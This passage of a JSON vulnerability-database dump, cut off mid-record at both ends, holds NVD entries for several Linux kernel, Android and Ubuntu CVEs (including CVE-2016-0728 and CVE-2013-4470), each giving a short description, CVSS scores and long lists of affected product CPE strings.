"CVE-2015-8812", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2023-01-19T16:13:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:novell:suse_linux_enterprise_real_time_extension:12", "cpe:/o:canonical:ubuntu_linux:12.04"], "id": "CVE-2015-8812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8812", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_real_time_extension:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*"]}, {"lastseen": "2023-05-31T14:06:11", "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-08T03:59:00", "type": "cve", "title": "CVE-2016-0728", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2023-02-12T23:15:00", "cpe": ["cpe:/o:google:android:4.1", "cpe:/o:google:android:4.0.2", "cpe:/o:google:android:4.4", "cpe:/o:google:android:4.2.1", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:google:android:4.3", "cpe:/o:google:android:4.0.3", "cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:google:android:4.3.1", "cpe:/o:google:android:4.4.2", "cpe:/o:google:android:4.4.3", "cpe:/o:google:android:5.1.1", "cpe:/o:google:android:6.0", "cpe:/o:google:android:5.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:google:android:6.0.1", "cpe:/o:google:android:5.1", "cpe:/o:google:android:4.0.1", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/a:hp:server_migration_pack:7.5", "cpe:/o:google:android:4.2.2", "cpe:/o:google:android:4.0.4", "cpe:/o:google:android:5.1.0", "cpe:/o:google:android:5.0.1", "cpe:/o:google:android:4.0", "cpe:/o:google:android:4.4.1", "cpe:/o:google:android:4.2", "cpe:/o:google:android:5.0.2", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:google:android:4.1.2"], "id": "CVE-2016-0728", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0728", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:google:android:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:server_migration_pack:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe:2.3:o:google:android:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:13:06", "description": "Multiple stack-based buffer overflows in the magicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the Magic Mouse HID driver in the Linux kernel through 3.16.3 allow physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted device that provides a large amount of (1) EHCI or (2) XHCI data associated with an event.", "cvss3": {}, "published": "2014-09-28T10:55:00", "type": "cve", "title": "CVE-2014-3181", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3181"], "modified": "2015-03-26T01:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.16.1", "cpe:/o:linux:linux_kernel:3.16.0", "cpe:/o:linux:linux_kernel:3.16.2", "cpe:/o:linux:linux_kernel:3.16.3"], "id": "CVE-2014-3181", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3181", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.16.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:09:47", "description": "The security_context_to_sid_core function in security/selinux/ss/services.c in the Linux kernel before 3.13.4 allows local users to cause a denial of service (system crash) by leveraging the CAP_MAC_ADMIN capability to set a zero-length security context.", "cvss3": {}, "published": "2014-02-28T06:18:00", "type": "cve", "title": "CVE-2014-1874", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1874"], "modified": "2023-02-13T00:38:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:suse:linux_enterprise_server:10", "cpe:/o:canonical:ubuntu_linux:12.04"], "id": "CVE-2014-1874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1874", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-31T14:58:54", "description": "The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.", "cvss3": {}, "published": "2013-11-04T15:55:00", "type": "cve", "title": "CVE-2013-4470", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4470"], "modified": "2023-02-13T04:47:00", "cpe": ["cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.10.15", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.11.2", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.11.3", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.10.17", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.10.16", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.11.7", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.9.11", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.10.14", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.10.0", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.4.11", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.11.4", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.10.18", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.11.6", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.11.5", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.10.13", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.2.25"], "id": "CVE-2013-4470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4470", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", 